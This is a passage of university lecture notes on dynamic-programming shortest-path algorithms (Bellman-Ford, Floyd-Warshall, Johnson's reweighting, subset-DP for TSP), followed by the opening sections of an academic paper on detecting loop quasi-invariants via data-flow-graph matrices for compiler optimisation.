infinitely often and has length negative infinity). As a shorthand in our drawings, if there is an edge of length $\ell$ from $u$ to $v$ and also an edge of length $\ell$ from $v$ to $u$, we will often just draw them together as a single undirected edge. So, all such edges must have positive weight. 2 Dijkstra’s Algorithm Let’s recall Dijkstra’s algorithm: given a directed graph $G = (V, E)$ with positive edge weights, the single-source shortest path problem can be solved using Dijkstra’s algorithm (you’ve seen this in 15-210) in time $O(m \log n)$. This uses a standard heap data-structure; using a fancier data structure called Fibonacci heaps, one can implement Dijkstra’s algorithm in $O(m + n \log n)$ time. This will be a benchmark to keep in mind. 3 The Bellman-Ford Algorithm We will now look at a Dynamic Programming algorithm called the Bellman-Ford Algorithm for the single-source shortest path problem. We will assume the graph is represented as a reversed adjacency list: an array $P$ of size $n$ where entry $v$ is the list of vertices from which there is an edge to $v$. (Given a node $v$, we can find all the other nodes $u$ such that there is an edge from $u$ to $v$ in time proportional to the number of such neighbors). 
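As a concrete, illustrative sketch of this representation (the input format and names here are ours, not the notes'), the following Python snippet builds such a reversed adjacency list from an edge list; each entry also carries the edge length, so that len(u, v) is available while scanning the in-neighbors of v.

```python
# Build a reversed adjacency list P from a list of weighted, directed edges.
# P[v] holds (u, length) for every edge u -> v, so all in-neighbors of v can
# be scanned in time proportional to v's in-degree.
def reversed_adjacency_list(n, edges):
    """n: number of vertices, named 1..n; edges: iterable of (u, v, length)."""
    P = {v: [] for v in range(1, n + 1)}
    for u, v, length in edges:
        P[v].append((u, length))
    return P

# Example: three vertices, edges 1->2 (length 5), 2->3 (length -2), 1->3 (length 4).
P = reversed_adjacency_list(3, [(1, 2, 5), (2, 3, -2), (1, 3, 4)])
# P == {1: [], 2: [(1, 5)], 3: [(2, -2), (1, 4)]}
```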
How can we use Dynamic Programming to find the shortest path from $s$ to all other nodes? First of all, as usual for Dynamic Programming, let's focus first on computing the lengths of the shortest paths. Later we'll see how to store a little extra information to be able to reconstruct the paths themselves. The idea for the algorithm is to keep track of the shortest path from $s$ to $v$ using paths consisting of $k$ or fewer edges.

1. For each node $v$, find the length of the shortest path from $s$ that uses zero edges, or write down $\infty$ if there is no such path. This is easy: if $v = s$ this is 0, otherwise it's $\infty$.
2. Now, suppose for all $v$ we have solved for the length of the shortest path from $s$ that uses $k - 1$ or fewer edges. How can we use this to solve for the shortest path that uses $k$ or fewer edges? Answer: the shortest path from $s$ to $v$ (where $v \neq s$) that uses $k$ or fewer edges will first go to some neighbor $x$ of $v$ using $k - 1$ or fewer edges, then follow the edge $(x, v)$ to get to $v$. The first part of this path is already known for all $x$. So, we just need to take the min over all neighbors $x$ of $v$. To update the value for $s$, we do the same thing, except we also have to consider its distance using $k - 1$ edges, because the path might not have a predecessor.
3. How far do we need to go? Answer: at most $k = n - 1$ edges.

So we can set this up as a recurrence. Let $D(v, k)$ be the minimum length of a path from $s$ to $v$ using $k$ or fewer edges.

$$D(v, k) = \begin{cases} 0 & \text{if } k = 0 \text{ and } v = s \\ \infty & \text{if } k = 0 \text{ and } v \neq s \\ \min\{D(v, k - 1), \min_{x \in P(v)} D(x, k - 1) + \text{len}(x, v)\} & \text{otherwise} \end{cases}$$

The final answer we're looking for is $D(v, n - 1)$. We could compute this by memoizing the above recurrence. Alternatively, we could do it bottom-up, viewing $D[v][k]$ as a two-dimensional array of distances. The algorithm then becomes:

**Bottom-Up Bellman-Ford:**
- initialize: $D[v][0] \leftarrow$ if $v = s$ then 0 else $\infty$
- for $k = 1$ to $n - 1$:
  - for each $v \in V$:
    - $D[v][k] \leftarrow \min\{D[v][k - 1], \min_{u \in P(v)} D[u][k - 1] + \text{len}(u, v)\}$
- For each $v$, output $D[v][n - 1]$.

---
[1] The way the recurrence is written does not exactly mimic the description above. Here we consider the option $D(v, k - 1)$ for all nodes $v$, not just $s$. This removes extra cases in the recurrence and does not change the correctness.

We already argued for correctness of the algorithm. What about running time? The min operation takes time proportional to the in-degree of \( v \). So, the inner for-loop takes time proportional to the sum of the in-degrees of all the nodes, which is \( O(m) \). Therefore, the total time is \( O(mn) \).

So far we have only calculated the lengths of the shortest paths; how can we reconstruct the paths themselves? One easy way is (as usual for DP) to work backwards: if you're at vertex \( v \) at distance \( d[v] \) from \( s \), move to the neighbor \( x \) such that \( d[v] = d[x] + \text{len}(x,v) \). This allows us to reconstruct the path in time \( O(m + n) \), which is just a low-order term in the overall running time. Alternatively, we could instrument the algorithm with an additional array of parent pointers. Whenever we compute a new shorter distance from \( s \) to \( v \), we update \( v \)'s parent to be the \( x \) which caused that to happen.
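To make the bottom-up computation and the parent-pointer bookkeeping concrete, here is an illustrative Python sketch (ours, not from the notes). It keeps only the previous column of the table, which suffices because column k depends only on column k-1, and it records, for each vertex, the in-neighbor that last improved its distance.

```python
import math

def bellman_ford(n, P, s):
    """Single-source shortest paths from s (vertices named 1..n).

    P: reversed adjacency list; P[v] lists (u, len(u, v)) for edges u -> v.
    Returns (dist, parent); parent[v] is v's predecessor on a shortest path.
    """
    dist = {v: math.inf for v in range(1, n + 1)}
    dist[s] = 0
    parent = {v: None for v in range(1, n + 1)}
    for _ in range(n - 1):                 # paths of at most n-1 edges suffice
        new_dist = dict(dist)              # column k is computed from column k-1
        for v in range(1, n + 1):
            for u, length in P[v]:
                if dist[u] + length < new_dist[v]:
                    new_dist[v] = dist[u] + length
                    parent[v] = u          # remember which in-neighbor improved v
        dist = new_dist
    return dist, parent

# Tiny example: edges 1->2 (len 4), 1->3 (len 2), 3->2 (len -3).
P = {1: [], 2: [(1, 4), (3, -3)], 3: [(1, 2)]}
dist, parent = bellman_ford(3, P, 1)
# dist == {1: 0, 2: -1, 3: 2}, parent == {1: None, 2: 3, 3: 1}
```

Following the parent links from any vertex back to $s$ recovers a shortest path.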
At the end these pointers are a representation of the entire shortest path tree from \( s \) to all other vertices. The algorithm accommodates negative edges. And it can be used to detect if a graph has a negative cycle reachable from \( s \). If there is no such negative cycle, then the shortest path from \( s \) to \( v \) for all \( v \) uses at most \( n - 1 \) edges. (If it uses more than that it must use a vertex twice and thus involve a cycle.) Thus if we were to make one additional pass with \( k = n \), none of the distances would change. So if we make an additional pass and some of the distances change, this means that there IS a negative cycle reachable from \( s \). The cycle can be found via the use of the parent pointers mentioned above. ### 4 All-pairs Shortest Paths Say we want to compute the length of the shortest path between every pair of vertices. This is called the all-pairs shortest path problem. If we use Bellman-Ford for all \( n \) possible destinations \( t \), this would take time \( O(mn^2) \). We will now see three alternative Dynamic-Programming algorithms for this problem: the first uses the matrix representation of graphs and runs in time \( O(n^3 \log n) \); the second, called the Floyd-Warshall algorithm uses a different way of breaking into subproblems and runs in time \( O(n^3) \). The third allows us to adapt Dijkstra’s SSSP algorithm to the APSP problem, even on graphs with negative edge lengths. #### 4.1 All-pairs Shortest Paths via Matrix Products Given a weighted graph \( G \), define the matrix \( A = A(G) \) as follows: - \( A[i, i] = 0 \) for all \( i \). - If there is an edge from \( i \) to \( j \), then \( A[i, j] = \text{len}(i,j) \). - Otherwise (\( i \neq j \) and there is no edge from \( i \) to \( j \)), \( A[i, j] = \infty \). I.e., \( A[i, j] \) is the length of the shortest path from \( i \) to \( j \) using 1 or fewer edges\(^2\). Now, following the basic Dynamic Programming idea, can we use this to produce a new matrix \( B \) where \( B[i, j] \) is the length of the shortest path from \( i \) to \( j \) using 2 or fewer edges? **Answer:** yes. \( B[i, j] = \min_k (A[i, k] + A[k, j]) \). Think about why this is true! \(^2\)There are multiple ways to define an adjacency matrix for weighted graphs — e.g., what \( A[i, i] \) should be and what \( A[i, j] \) should be if there is no edge from \( i \) to \( j \). The right definition will typically depend on the problem you want to solve. I.e., what we want to do is compute a matrix product $B = A \times A$ except we change “$\times$” to “$+$” and we change “$+$” to “min” in the definition. In other words, instead of computing the sum of products, we compute the min of sums. What if we now want to get the shortest paths that use 4 or fewer edges? To do this, we just need to compute $C = B \times B$ (using our new definition of matrix product). I.e., to get from $i$ to $j$ using 4 or fewer edges, we need to go from $i$ to some intermediate node $k$ using 2 or fewer edges, and then from $k$ to $j$ using 2 or fewer edges. So, to solve for all-pairs shortest paths we just need to keep squaring $O(\log n)$ times. Each matrix multiplication takes time $O(n^3)$ so the overall running time is $O(n^3 \log n)$. ### 4.2 All-pairs shortest paths via Floyd-Warshall Here is an algorithm that shaves off the $O(\log n)$ and runs in time $O(n^3)$. The idea is that instead of increasing the number of edges in the path, we’ll increase the set of vertices we allow as intermediate nodes in the path. 
In other words, starting from the same base case (the shortest path that uses no intermediate nodes), we'll then go on to consider the shortest path that's allowed to use node 1 as an intermediate node, the shortest path that's allowed to use {1, 2} as intermediate nodes, and so on.

```plaintext
// After each iteration of the outside loop, A[i][j] = length of the
// shortest i->j path that’s allowed to use vertices in the set 1..k
for k = 1 to n do:
    for each i,j do:
        A[i][j] = min( A[i][j], A[i][k] + A[k][j] )
```

I.e., you either go through node $k$ or you don't. The total time for this algorithm is $O(n^3)$. What's amazing here is how compact and simple the code is!

### 4.3 Adapting Dijkstra's Algorithm for All-pairs

If all the edge lengths in the graph are non-negative, then we can run Dijkstra's algorithm $n$ times, once for each starting vertex. This gives all-pairs shortest paths, and the running time is $O(n(n + m) \log n)$. This is better than Floyd-Warshall on graphs that are sparse. In fact, as long as the number of edges is $O(n^2/\log n)$ it equals or beats $O(n^3)$. On the other hand, it does not handle graphs with negative edge lengths.

This can be remedied by a trick discovered by Don Johnson. The idea is to somehow adjust the lengths of all the edges so that (1) they are all non-negative and (2) the shortest paths are the same in the original and in the modified graph.

We're going to compute a real-valued potential on each vertex. The potential of vertex $v$ is denoted $\Phi_v$. If we have an edge $(u, v)$ in the graph of length $\ell$, then its length in the modified graph is $\ell' = \ell + (\Phi_u - \Phi_v)$. Consider a path $P$ of length $L$ from $u$ to $v$ in the original graph. When you sum the modified lengths of the edges on that path, it's easy to see that the potential values all telescope and you're left with $L$ plus the starting potential minus the ending potential. In other words, if $L'$ is the length of the path in the modified graph, we have:

$$L' = L + \Phi_u - \Phi_v.$$

This is true for any path from \( u \) to \( v \); the potential difference is a constant independent of the path. Thus, the shortest path from \( u \) to \( v \) in the original graph and in the modified graph are exactly the same.

How do we find such a magic set of potentials? Here's how. Create a new vertex called 0, and add an edge of length 0 from vertex 0 to every other vertex. Now find the shortest path from vertex 0 to every other vertex using the Bellman-Ford algorithm. (If there is a negative cycle, this algorithm will find it.) Define \( \Phi_v \) to be the length of the shortest path from vertex 0 to \( v \). Now consider an edge \( (u, v) \) of length \( \ell \). We know that

\[ \Phi_u + \ell \geq \Phi_v \]

(if this were not true, then there would be a shorter path than \( \Phi_v \) from vertex 0 to \( v \) by going through \( u \)). It follows that

\[ \ell' = \ell + \Phi_u - \Phi_v \geq 0, \]

which proves that the modified edge lengths are non-negative. The running time of the Bellman-Ford part is \( O(nm) \), and the running time of the \( n \) runs of Dijkstra's algorithm is \( O(n(n + m) \log n) \). Assuming the graph is connected and that \( m \geq n \), this simplifies to \( O(nm \log n) \).[3]

### 5 TSP

The NP-hard Traveling Salesperson Problem (TSP) asks for the shortest route that visits all vertices in the graph. To be precise, the TSP is the shortest tour that visits all vertices and returns back to the start.[4]

Since the problem is NP-hard, we don't expect that Dynamic Programming will give us a polynomial-time algorithm, but perhaps it can still help. Specifically, the naive algorithm for the TSP is just to run brute-force over all \( n! \) permutations of the \( n \) vertices and to compute the cost of each, choosing the shortest. (We can reduce this to \( (n-1)! \) as follows. First of all, without loss of generality, we can assume some vertex \( x \) is the start vertex. This reduces the number of permutations to try to \( (n-1)! \). Secondly, as we generate the permutation, we can keep track of the cost of the permutation up to this point, so there's no need to pay the \( O(n) \) cost for each permutation to add up the costs.) We're going to use Dynamic Programming to reduce this to \( O(n^2 2^n) \). This is still brute force, but it's not as brutish as the naive algorithm.

As usual, let's first just worry about computing the cost of the optimal solution, and then we'll later be able to add in some hooks to recover the path. Also, let's work with the shortest-path metric where we've already computed all-pairs shortest paths (using, say, Floyd-Warshall), so we can view our graph as a complete graph with weights between any two vertices representing the shortest-path distance between them. This is convenient since it means a solution is really just a permutation. Finally, let's call the start vertex \( x \).

Now, here is one fact we can use. Suppose someone told you what the initial part of the solution should look like and we want to use this to figure out the rest. Then really all we need to know about it, for the purpose of completing it into a tour, is the set of vertices visited in this initial segment and the last vertex \( t \) visited in the set. We don't really need the whole ordering of the initial segment. This means there are only \( n2^n \) subproblems (one for every set of vertices and ending vertex \( t \) in the set). Furthermore, we can compute the optimal solution to a subproblem in time \( O(n) \) given solutions to smaller subproblems (just look at all possible vertices \( t' \) in the set we could have been at right before going to \( t \), and take the one that minimizes the cost so far (stored in our lookup table) plus the distance from \( t' \) to \( t \)).

Let's set this up as a recurrence. Let \( t \) be a vertex that is different from the start vertex \( x \). Let \( S \) be a set of vertices containing \( x \) and \( t \). Define \( C(S, t) \) as the minimum cost of a path that starts at \( x \), ends at \( t \), and hits all vertices in \( S \) along the way. Here's a recurrence for \( C(S, t) \):

\[ C(S, t) = \begin{cases} \text{len}(x, t) & \text{if } S = \{x, t\} \\ \min_{t' \in S,\; t' \neq t,\; t' \neq x} \left( C(S \setminus \{t\}, t') + \text{len}(t', t) \right) & \text{otherwise} \end{cases} \]

The parameter space for \( C(S, t) \) is \( 2^{n-1} \) (the number of subsets \( S \) considered) times \( n \) (the number of choices for \( t \)). For each recursive call we do \( O(n) \) work inside the call, for a total of \( O(n^2 2^n) \) time. The last thing is that we just need to reconstruct the paths, but this is easy to do from the stored computations in the same way as we did for shortest paths.

This technique is sometimes called “Subset DP”. These ideas apply in many cases to reduce a factorial running time to a regular exponential running time. A very nice way to implement these kinds of algorithms in practice is to represent the set \( S \) as an integer, where a 1 bit in position \( b \) means the presence of \( b \) in the set. This facilitates memoization, because the set is now just an integer that can quickly be used to index an array or be looked up in a hash table.

---
[3] Using Fibonacci heaps, Dijkstra's algorithm runs in \( O(m + n \log n) \). This gives an all-pairs algorithm whose running time is \( O(nm + n^2 \log n) \). So even on dense graphs this is no worse asymptotically than Floyd-Warshall.
[4] Note that under this definition, it doesn't matter which vertex we select as the start. The Traveling Salesperson Path Problem is the same thing but does not require returning to the start. Both problems are NP-hard.
[5] For more, see [http://xkcd.com/399/](http://xkcd.com/399/)
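To make the bit-encoding idea concrete, here is an illustrative bottom-up Python sketch in the spirit of Held-Karp (the function name and input format are ours, not the notes'). A set \( S \) is an integer whose bit \( b \) is 1 exactly when vertex \( b \) is in \( S \), and vertex 0 plays the role of the start vertex \( x \).

```python
import math

def tsp_tour_cost(dist):
    """dist[i][j]: (shortest-path) distance from i to j; assumes n >= 2 vertices.
    Returns the cost of the cheapest tour that starts and ends at vertex 0."""
    n = len(dist)
    size = 1 << n
    # C[S][t]: minimum cost of a path that starts at 0, visits exactly the
    # vertices whose bits are set in S (0 and t included), and ends at t.
    C = [[math.inf] * n for _ in range(size)]
    for t in range(1, n):
        C[(1 << 0) | (1 << t)][t] = dist[0][t]       # base case: S = {0, t}
    for S in range(size):
        if not (S & 1):                               # every set must contain 0
            continue
        for t in range(1, n):
            if not (S >> t) & 1 or C[S][t] == math.inf:
                continue
            for t2 in range(1, n):                    # extend the path to t2
                if (S >> t2) & 1:
                    continue
                S2 = S | (1 << t2)
                cost = C[S][t] + dist[t][t2]
                if cost < C[S2][t2]:
                    C[S2][t2] = cost
    full = size - 1
    return min(C[full][t] + dist[t][0] for t in range(1, n))

# Example on 4 vertices (symmetric distances); the best tour costs 80.
d = [[0, 10, 15, 20],
     [10, 0, 35, 25],
     [15, 35, 0, 30],
     [20, 25, 30, 0]]
print(tsp_tour_cost(d))  # -> 80
```

A hash table keyed by the pair (S, t) would work just as well; indexing an array directly by the integer S is what the bit encoding buys.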
{"Source-Url": "http://www.cs.cmu.edu/~15451/lectures/lec13-dp2.pdf", "len_cl100k_base": 4909, "olmocr-version": "0.1.53", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 21371, "total-output-tokens": 5365, "length": "2e12", "weborganizer": {"__label__adult": 0.0005402565002441406, "__label__art_design": 0.0004189014434814453, "__label__crime_law": 0.0006265640258789062, "__label__education_jobs": 0.0021038055419921875, "__label__entertainment": 0.00017321109771728516, "__label__fashion_beauty": 0.0002617835998535156, "__label__finance_business": 0.0003743171691894531, "__label__food_dining": 0.00070953369140625, "__label__games": 0.0017547607421875, "__label__hardware": 0.0019588470458984375, "__label__health": 0.0012969970703125, "__label__history": 0.0006809234619140625, "__label__home_hobbies": 0.0002963542938232422, "__label__industrial": 0.0007920265197753906, "__label__literature": 0.0004642009735107422, "__label__politics": 0.0003666877746582031, "__label__religion": 0.0007610321044921875, "__label__science_tech": 0.1854248046875, "__label__social_life": 0.0001678466796875, "__label__software": 0.00994110107421875, "__label__software_dev": 0.78662109375, "__label__sports_fitness": 0.0008897781372070312, "__label__transportation": 0.0027942657470703125, "__label__travel": 0.0006628036499023438}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 18427, 0.01157]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 18427, 0.60313]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 18427, 0.89562]], "google_gemma-3-12b-it_contains_pii": [[0, 3067, false], [3067, 6065, null], [6065, 9528, null], [9528, 12639, null], [12639, 16198, null], [16198, 18427, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3067, true], [3067, 6065, null], [6065, 9528, null], [9528, 12639, null], [12639, 16198, null], [16198, 18427, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 18427, null]], "pdf_page_numbers": [[0, 3067, 1], [3067, 6065, 2], [6065, 9528, 3], [9528, 12639, 4], [12639, 16198, 5], [16198, 18427, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 18427, 0.0]]}
olmocr_science_pdfs
2024-12-11
2024-12-11
650ccf00a004d8836d3beec442800fe433c9fc38
Loop quasi-invariant chunk motion by peeling with statement composition Moyen, Jean-Yves; Rubiano, Thomas; Seiller, Thomas Published in: Proceedings 8th Workshop on Developments in Implicit Computational Complexity and 5th Workshop on Foundational and Practical Aspects of Resource Analysis DOI: 10.4204/EPTCS.248.9 Publication date: 2017 Document Version Publisher's PDF, also known as Version of record Citation for published version (APA): Loop Quasi-Invariant Chunk Motion by peeling with statement composition Jean-Yves Moyen Department of Computer Science University of Copenhagen (DIKU) moyen@lipn.univ-paris13.fr Thomas Rubiano Université Paris 13 - LIPN Department of Computer Science University of Copenhagen (DIKU) rubiano@lipn.univ-paris13.fr Thomas Seiller Department of Computer Science University of Copenhagen (DIKU) seiller@di.ku.dk Several techniques for analysis and transformations are used in compilers. Among them, the peeling of loops for hoisting quasi-invariants can be used to optimize generated code, or simply ease developers’ lives. In this paper, we introduce a new concept of dependency analysis borrowed from the field of Implicit Computational Complexity (ICC), allowing to work with composed statements called “Chunks” to detect more quasi-invariants. Based on an optimization idea given on a WHILE language, we provide a transformation method - reusing ICC concepts and techniques [9, 10] - to compilers. This new analysis computes an invariance degree for each statement or chunks of statements by building a new kind of dependency graph, finds the “maximum” or “worst” dependency graph for loops, and recognizes if an entire block is Quasi-Invariant or not. This block could be an inner loop, and in that case the computational complexity of the overall program can be decreased. We already implemented a proof of concept on a toy C parser[1] analysing and transforming the AST representation. In this paper, we introduce the theory around this concept and present a prototype analysis pass implemented on LLVM. In a very near future, we will implement the corresponding transformation and provide benchmarks comparisons. 1 Introduction A command inside a loop is an invariant if its execution has no effect after the first iteration of the loop. Typically, an assignment $x:=0$ in a loop is invariant (provided $x$ is not modified elsewhere). Loop invariants can safely be moved out of loops (hoisted) in order to make the program faster. A command inside a loop is quasi-invariant if its execution has no effect after a finite number of iterations of the loop. Typically, if a loop contains the sequence $x:=y$, $y:=0$, then $y:=0$ is invariant. However, $x:=y$ is not invariant. The first time the loop is executed, $x$ will be assigned the old value of $y$, and only from the second time onward will $x$ be assigned the value 0. Hence, this command is quasi-invariant. It can still be hoisted out of the loop, but to do so requires to peel the loop first, that is execute its body once (by copying it before the loop). The number of times a loop must be executed before a quasi-invariant can be hoisted is called here the degree of the invariant. © J.Y. Moyen, T. Rubiano, T. Seiller This work is licensed under the Creative Commons Attribution License. G. Bonfante, G. 
An obvious way to detect quasi-invariants is to first detect invariants (that is, quasi-invariants of degree 1) and hoist them, then iterate the process to find quasi-invariants of degree 2, and so on. This is, however, not very efficient since it may require a large number of iterations to find some invariance degrees. We provide here an analysis able to directly detect the invariance degree of any statement in the loop. Moreover, our analysis is able to assign an invariance degree not only to individual statements but also to groups of statements (called chunks). That way it is possible, for example, to detect that a whole inner loop is invariant and hoist it, thus decreasing the asymptotic complexity of the program.

Loop optimization techniques based on quasi-invariance are well known in the compilers community. The transformation idea is to peel loops a finite number of times and hoist invariants until there are no more quasi-invariants. As far as we know, this technique is called "peeling" and was introduced by Song et al. [13]. The present paper offers a new point of view on this work. Starting from an optimization on a WHILE language by Lars Kristiansen [9], we provide a redefinition of peeling and another transformation method based on techniques developed in the field of Implicit Computational Complexity.

Implicit Computational Complexity (ICC) studies computational complexity in terms of restrictions of languages and computational principles, providing results that do not depend on specific machine models. Based on static analysis, it helps predict and control the resources consumed by programs, and can offer reusable and tunable ideas and techniques for compilers. ICC mainly focuses on syntactic [4, 3], type [6, 2] and Data Flow [11, 7, 8, 12] restrictions to provide bounds on programs' complexity. The present work was mainly inspired by the way the ICC community uses different concepts to perform Data Flow Analysis, e.g. "Size-Change Graphs" [11] or "Resource Control Graphs" [12], which track data values' behaviour and use a matrix notation inspired by [1], or "mwp-polynomials" [8] to provide bounds on data size. For our analysis, we focus on dependencies between variables to detect invariance. Dependency graphs [10] can have different types of arcs representing different kinds of dependencies. Here we will use a kind of Dependence Graph Abstraction [5] that can be used to find local and global quasi-invariants.

Based on these techniques, we developed an analysis pass, and we will implement the corresponding transformation in LLVM. We propose a tool which is notably able to give enough information to easily peel and hoist an inner loop, thus decreasing the complexity of a program from $n^2$ to $n$.

### 1.1 State of the art on quasi-invariant detection in loops

Invariants are basically detected using Algorithm 1. A dependency graph around variables is needed to provide relations between statements. For quasi-invariance, we need to couple dependence and dominance information. In [13], the authors define a variable dependency graph (VDG) and detect a loop quasi-invariant variable $x$ if, among all paths ending at $x$, no path contains a node included in a circular path. Then they deduce an invariant length which corresponds to the length of the longest path ending in $x$.
In the present paper, this length is called invariance degree. ### 1.2 Contributions To the authors’ knowledge, this is the first application of ICC techniques on a mainstream compiler. One interest is that our tool potentially applies to programs written in any programming language managed by LLVM. Moreover, this work should be considered as a first step of a larger project that will make ICC techniques more accessible to programmers. On a more technical side, our tool aims at improving on currently implemented loop invariant detec- tion and optimization techniques. The main LLVM tool for this purpose, Loop Invariant Code Motion (LICM), does not detect quasi-invariant of degree more than 3 (and not all of those of degree 2). More importantly, LICM will not detect quasi-invariant blocks of code (what we call chunk), such as whole loops. Our tool, on the other hand, detects quasi-invariants of arbitrary degree and is able to deal with chunks. For instance the optimization shown in [Figure 9] is not performed by LLVM nor in GCC even at their maximum optimization level. 2 In theory In this section, we redefine our own types of relations between variables to build a new dependency graph and apply a composition inspired by the graph composition of Size-Change Termination [11]. 2.1 Relations and Data Flow Graph We work with a simple imperative WHILE-language (the grammar is shown in [Figure 1], with semantics similar to C. $$ \begin{align*} (\text{Variables}) & \quad X & \ ::= & \quad X_1 \mid X_2 \mid X_3 \mid \ldots \mid X_n \\ (\text{Expression}) & \quad exp & \ ::= & \quad X \mid \text{op}(\text{exp}, \ldots, \text{exp}) \\ (\text{Command}) & \quad com & \ ::= & \quad X=\text{exp} \mid \text{com;com} \mid \text{skip} \mid \\ & & & \text{while } \text{exp} \text{ do } \text{com} \text{ od} \mid \\ & & & \text{if } \text{exp} \text{ then } \text{com} \text{ fi} \mid \\ & & & \text{use}(X_1, \ldots, X_n) \end{align*} $$ Figure 1: Grammar A WHILE program is thus a sequence of statements, each statement being either an assignment, a conditional, a while loop, a function call or a skip. The use command represents any command which does not modify its variables but use them and should not be moved around carelessly (typically, a printf). Statements are abstracted into commands. A command can be a statement or a sequence of commands. We also call a sequence of commands a chunk. **Data:** List of Statements in the Loop **Result:** List of Loop-invariants LI Initialization: while search until there is no new invariant... do for each statement \( s \) do if each variable in \( s \) has no definition in the loop or has exactly one loop-invariant definition or is constant then Add \( s \) to LI; end end end **Algorithm 1:** Basic invariants detection We start by giving an informal but intuitive definition of the notion of Data Flow Graph (DFG). A DFG represents dependencies between variables as a bipartite graph as in Figure 2. Each different type of arrow represents different types of dependencies. Each variable is shown twice: the occurrence on the left represents the variable before the execution of the command while the occurrence on the right represents the variable after the execution. Dependencies are then represented by two types of arrows from variables on the left to variables on the right: plain arrows for direct dependence, dashed arrows for propagation. Reinitialisation of a variable z then corresponds to the absence of arrows ending on the right occurrence of z. 
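To make the detection rule of Algorithm 1 above concrete, here is a minimal Python sketch that iterates it to a fixpoint. The statement representation (a list of (target, used-variables) pairs) and all names are assumptions made for this illustration, not the paper's implementation.

```python
# Minimal sketch of Algorithm 1: iterate the basic invariant rule until
# no new invariant is found. A loop body is modelled as a list of
# assignments (target, used_vars); this encoding is illustrative only.

def basic_invariants(body):
    defs = {}                        # variable -> number of definitions in the loop
    for target, _ in body:
        defs[target] = defs.get(target, 0) + 1

    invariant = set()                # indices of statements found invariant
    changed = True
    while changed:                   # "search until there is no new invariant"
        changed = False
        for i, (_target, used) in enumerate(body):
            if i in invariant:
                continue
            ok = all(
                defs.get(v, 0) == 0                              # not defined in the loop
                or (defs[v] == 1                                  # or exactly one definition,
                    and any(j in invariant and body[j][0] == v    # which is itself invariant
                            for j in range(len(body))))
                for v in used
            )
            if ok:
                invariant.add(i)
                changed = True
    return invariant

# Example: x := c + 1; y := x * 2  (c is not defined in the loop)
print(basic_invariants([("x", ["c"]), ("y", ["x"])]))   # -> {0, 1}
```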
Figure 2 illustrates these types of dependencies; let us stress here that the DFG would be the same if the assignment \( y = y \) were to be removed from C, since the value of y is still propagated. More formally, a DFG of a command C is a triple \((V, \mathcal{R}_{dep}, \mathcal{R}_{prop})\), with V the set of variables involved in the command C together with two relations on this set. These two relations express how the values of the involved variables after the execution of the command depend on their values before the execution. There is a direct dependence between the variables appearing in an expression and the variable on the left-hand side of the assignment. For instance \( x \) directly depends on \( y \) and \( z \) in the statement \( x = y + z \). When a variable is unchanged by the command we call it propagation. Propagation only happens when a variable is not affected by the command, not when it is copied from another variable. If the variable is set to a constant, we call this a reinitialization.

More technically, we will work with an alternative representation in terms of matrices. While less intuitive, this allows for more natural compositions, based on standard linear algebra operations. Before providing the formal definition, let us introduce the semi-ring \(\{0, \bar{0}, 1\}\): the addition \(\oplus\) and multiplication \(\otimes\) are defined in Figure 3. Let us remark that, identifying 0 as \(-\infty\), this is a sub-semi-ring of the standard tropical semi-ring, with \(\oplus\) and \(\otimes\) interpreted as max and + respectively.

\[
\begin{array}{c|ccc}
\oplus & 0 & \bar{0} & 1 \\
\hline
0 & 0 & \bar{0} & 1 \\
\bar{0} & \bar{0} & \bar{0} & 1 \\
1 & 1 & 1 & 1 \\
\end{array}
\quad
\begin{array}{c|ccc}
\otimes & 0 & \bar{0} & 1 \\
\hline
0 & 0 & 0 & 0 \\
\bar{0} & 0 & \bar{0} & 1 \\
1 & 0 & 1 & 1 \\
\end{array}
\]

Figure 3: Addition and Multiplication in the semi-ring \(\{0, \bar{0}, 1\}\).

Definition 1 A Data Flow Graph for a command C is an \(n \times n\) matrix over the semi-ring \(\{0, \bar{0}, 1\}\), where n is the number of variables involved in C. We write \(M(C)\) for the DFG of C. At line i, column j, we have a 0 if the output value of the jth variable does not depend on the input value of the ith; a \(\bar{0}\) in case of propagation (unmodified variable); and a 1 for any other kind of dependence.

\(^2\)Note that \(y = y\) does not create a direct dependence.

Definition 2 Let $C$ be a command. We define $\text{In}(C)$ (resp. $\text{Out}(C)$) as the set of variables used (resp. modified) by $C$. Note that $\text{In}(C)$ and $\text{Out}(C)$ are exactly the sets of variables that are at either end of the "dependence" arrows.

2.2 Constructing DFGs

We now describe how the DFG of a command can be computed by induction on the structure of the command. Base cases (skip, use and assignment) are done in the obvious way, generalising slightly the definitions of DFGs shown in Figure 2.

2.2.1 Composition and Multipath

We now turn to the definition of the DFG for a (sequential) composition of commands. This abstraction allows us to see a block of statements as one command with its own DFG.

Definition 3 Let $C$ be a sequence of commands $[C_1; C_2; \ldots; C_n]$. Then $M(C)$ is defined as the matrix product $M(C_1)M(C_2)\ldots M(C_n)$.

Following the usual product of matrices, the product of two matrices $A, B$ is defined here as the matrix $C$ with coefficients:

$$C_{i,j} = \bigoplus_{k=1}^n (A_{i,k} \otimes B_{k,j}).$$

This operation of matrix multiplication corresponds to the computation of multipaths in the graph representation of DFGs.
